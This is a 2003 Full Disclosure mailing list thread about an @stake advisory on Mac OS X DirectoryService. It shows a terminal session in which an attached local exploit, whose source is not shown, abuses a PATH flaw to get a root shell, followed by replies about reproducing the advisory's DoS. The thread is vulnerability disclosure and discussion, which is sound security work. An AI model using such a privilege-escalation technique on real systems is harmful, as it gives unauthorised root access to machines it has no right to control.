Full Disclosure mailing list archives
Re: OS X DirectoryService DoS {@stake adv:
From: Neeko Oni <neeko () haackey com>
Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)
Hoping to encourage people to figure out what @stake was talking about in regards to the OS X DirectoryService DoS, I've attached a local exploit for DirectoryService _once it has been crashed/killed_.

[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~#
Neeko Oni wrote:

Ok, the PATH problem is self-explanatory (and has been exploited once the DirectoryService process has crashed) but I've had some difficulty reproducing the DoS attack claim. I've got a 10.2.4 machine sitting right next to me, I believe it's a stock install, but DirectoryService doesn't bind 625. DirectoryService doesn't bind any ports and furthermore nothing binds 625 at all. Has anyone reproduced the DoS in that advisory?

I also read the advisory and of the two MacOS machines that I am able to access (only one locally) I can confirm that on the machine that I don't have local access there was a daemon running on port 625 and as the advisory states I was able to reproduce the DoS attack. I'm not sure exactly which version of MacOS X that machine was running but the daemon did crash and refuse connection. On the machine that I know for a fact is 10.2.4 and have local access to, DirectoryService was setuid root and was running but there was no port 625 open. I haven't port scanned the machine to check other ports yet so I'm not ruling out the possibility it's running on a different port just yet. Has anyone else looked into this matter... ?

-subversive
Attachment:
osxds.c
Description: C program text
Current thread:
- Re: OS X DirectoryService DoS {@stake adv: a041003-1} subversive (Apr 17)
- Re: OS X DirectoryService DoS {@stake adv: Neeko Oni (Apr 17)